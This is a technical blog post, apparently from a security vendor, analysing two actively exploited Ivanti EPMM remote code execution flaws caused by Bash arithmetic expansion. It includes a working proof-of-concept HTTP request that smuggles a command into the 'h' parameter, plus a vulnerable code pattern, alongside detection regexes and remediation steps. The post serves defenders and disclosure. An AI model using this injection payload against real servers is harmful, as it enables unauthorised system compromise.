CVE-2026-1281 & CVE-2026-1340 Technical Deep Dive

Published: February 2, 2026

Executive Summary

January 2026 brought yet another critical blow to Ivanti customers. Two pre-authentication remote code execution vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) have been actively exploited in the wild as zero-days. Both vulnerabilities carry a CVSS score of 9.8 and allow unauthenticated attackers to achieve complete system compromise through a fascinating—and frankly terrifying—abuse of Bash's arithmetic expansion feature.

This post breaks down the technical details, exploitation mechanics, detection strategies, and remediation guidance that security teams need to know.

Background: What is Ivanti EPMM?

Ivanti Endpoint Manager Mobile (formerly MobileIron Core) is an enterprise mobility management (MDM/UEM) platform used to manage, secure, and enforce policies on mobile devices across iOS, Android, and other endpoints. It's deployed by large organizations worldwide to control corporate mobile fleets, distribute applications, and protect access to enterprise resources.

Given its privileged position in enterprise networks—often with access to sensitive device data, authentication systems, and internal resources—EPMM represents a high-value target for threat actors. This isn't EPMM's first rodeo with zero-days either: the platform was exploited via CVE-2023-35078 in 2023 and through CVE-2025-4427/CVE-2025-4428 in 2025.

The Vulnerabilities

CVE-2026-1281

• Type: Code Injection (Pre-Authentication RCE)
• CVSS Score: 9.8 (Critical)
• Affected Component: In-House Application Distribution feature
• Status: Actively exploited in the wild, added to CISA KEV

CVE-2026-1340

• Type: Code Injection (Pre-Authentication RCE)
• CVSS Score: 9.8 (Critical)
• Affected Component: Android File Transfer Configuration feature
• Status: Actively exploited in the wild

Both vulnerabilities affect on-premises EPMM installations. Cloud-hosted Ivanti Neurons for MDM, Ivanti Endpoint Manager (EPM), and Ivanti Sentry are not affected.

Technical Analysis: The Root Cause

The vulnerability exists in Bash scripts that handle URL mapping for the application store and Android file transfer features. These scripts are invoked via Apache's RewriteMap directive when specific endpoints are accessed.

The Vulnerable Architecture

EPMM's Apache configuration defines two RewriteMap instances:

RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url
RewriteMap mapAftStoreURL prg:/mi/bin/map-aft-store-url


When a user accesses specific application store endpoints, their HTTP request parameters are passed directly to these Bash scripts. For example, a request to:

/mifs/c/appstore/fob/3/<int>/sha256:<params>/<filename>.ipa


Results in the following input being passed to the map-appstore-url script:

<params>_<int>_<filename>_.ipa_<HostHeader>_<EndpointPath>


The Bash Arithmetic Expansion Trap

Here's where things get interesting. The Bash script parses key-value pairs from the URL parameters:

if [[ -z ${ret} ]] ; then
 for theKeyMapEntry in "${theAppStoreKeyValueArray[@]}" ; do
   theKey="${theKeyMapEntry%%=*}"
   theValue="${theKeyMapEntry##*=}"
   logDebug "${FUNCNAME}" "theKey=$theKey; theValue=$theValue"
   case ${theKey} in
     kid)
       gKeyIndex="${theValue}"
       ;;
     st)
       gStartTime="${theValue}"
       if (( ${#gStartTime} != "${kValidTimeStampLength}" )) ; then
         ret="${kTimestampLengthInvalidErrorCode}"
       fi
       ;;
     et)
       gEndTime="${theValue}"
       if (( ${#gEndTime} != "${kValidTimeStampLength}" )) ; then
         ret="${kTimestampLengthInvalidErrorCode}"
       fi
       ;;
     h)
       gHashPrefixString="${theValue}"
       ;;
     *)
       ret="${kURLStructureInvalidErrorCode}"
       logDenial "${FUNCNAME}" "${ret}" "unknown presented key=${theKey}; theValue=${theValue}"
       ;;
   esac
 done
fi


The variable gPath is defined earlier in the script as an empty string:

gPath=""


The gStartTime variable is later used in an arithmetic comparison:

if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]] ; then


Arithmetic Expansion + Command Substitution = RCE

Bash's arithmetic expansion feature evaluates expressions within (( )) or numeric comparisons. Critically, when a variable is treated as an array with an index containing command substitution, the shell executes that command while resolving the index.

The exploit works through a chain of variable indirection:

1. Setting st=theValue (with two trailing spaces for padding to pass the 10-character length validation)
2. Setting h=gPath[\command`]` where gPath is an existing variable in the script

Processing order matters: parameters are handled sequentially — kid, st, et, h — and each loop iteration overwrites theValue.

When the arithmetic comparison executes:

1. Bash evaluates ${gStartTime} and finds the string theValue
2. Arithmetic evaluation resolves theValue as a variable
3. That variable contains an array-style expression with command substitution
4. Bash evaluates the index
5. The embedded command executes

Proof of Concept

A minimal PoC demonstrating command execution:

GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,

et=1337133713,h=gPath%5B%60id%20>%20/mi/poc%60%5D
Host: target.example.com


URL-decoded:

h=gPath[`id > /mi/poc`]


This writes the output of the id command to /mi/poc on the target system.

Why This Vulnerability Class is Underappreciated

Bash arithmetic expansion vulnerabilities have been known since at least 2014 but are still frequently overlooked in security reviews.

Arithmetic contexts include:

$((expression))
((expression))
${var:offset:length}
${var[index]}
var[index]=value
[[ $var -eq $other ]]


Dangerous pattern:

user_input='x[`whoami`]'
if (( user_input == 0 )); then
 echo "zero"
fi


The command executes during evaluation.

Impact Assessment

Successful exploitation grants attackers:

• Full system access
• Administrator credential exposure
• User and device data access
• Phone numbers and identifiers
• GPS and location data (if enabled)
• MDM policy modification capability
• Authentication configuration control
• Lateral movement opportunities via Ivanti Sentry

Detection and Threat Hunting

Log Analysis

Search Apache HTTPD access logs using Ivanti’s recommended regex:

^(?!127\.0\.0\.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404


Indicators:

• Requests to /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/
• HTTP 404 responses from these endpoints
• Bash metacharacters in parameters

Web Shell Detection

Look for:

• Modified JSP error pages (especially 401.jsp)
• POST requests to error pages
• Unexpected parameters
• Unknown WAR or JAR files
• Known web shells such as Behinder

Network Indicators

• Outbound connections from EPMM appliances
• Long-running sessions to external IPs
• Reverse shell behavior

Important: Attackers may clear local logs. Use centralized logging.

Affected Versions and Remediation

Affected Versions

• 12.5.0.x
• 12.5.1.0
• 12.6.0.x
• 12.6.1.0
• 12.7.0.x

Temporary Patches (RPM Scripts)

• RPM 12.x.0.x → 12.5.0.x / 12.6.0.x / 12.7.0.x
• RPM 12.x.1.x → 12.5.1.0 / 12.6.1.0

Must be reapplied after upgrades.

Permanent Fix

Version 12.8.0.0 (expected Q1 2026).

Patch replaces Bash scripts with Java classes:

# Before patch
RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url

# After patch
RewriteMap mapAppStoreURL "prg:/bin/java -cp /mi/bin AppStoreUrlMapper"


Incident Response Guidance

Treat exposed systems as potentially compromised:

1. Assume compromise if internet-exposed
2. Rebuild or restore from known-good image
3. Review Ivanti Sentry connections
4. Audit authentication configs
5. Hunt for persistence
6. Check for unexpected users and shells

CISA Requirements

CISA added CVE-2026-1281 to KEV with a short remediation deadline of February 1, 2026.

Federal agencies must mitigate or discontinue vulnerable systems under BOD 22-01.

Key Takeaways for Security Teams

1. Patch immediately
2. Assume breach for exposed systems
3. Monitor attack patterns
4. Track internet-facing EPMM assets
5. Audit Bash scripts for arithmetic expansion risk

Timeline

Pre-Jan 29, 2026 — Active exploitation
Jan 29, 2026 — Ivanti disclosure
Jan 29, 2026 — Added to CISA KEV
Jan 30, 2026 — Public PoC
Feb 1, 2026 — CISA deadline
Q1 2026 — Permanent fix expected

References

1. Ivanti Security Advisory
2. watchTowr Labs Technical Analysis
3. CISA KEV Catalog Entry
4. Rapid7 Analysis
5. BleepingComputer Coverage
6. Expel Security Alert
7. The Register Analysis
8. NCC Group — Shell Arithmetic Expansion Abuse
9. NHS England Digital Advisory
10. Orange Cyberdefense Advisory

About Hadrian

At Hadrian, we continuously monitor for emerging threats like these Ivanti vulnerabilities across our customers' attack surfaces. Our autonomous security platform identifies exposed assets and prioritizes risks in real-time, helping organizations respond to zero-days before they become breaches.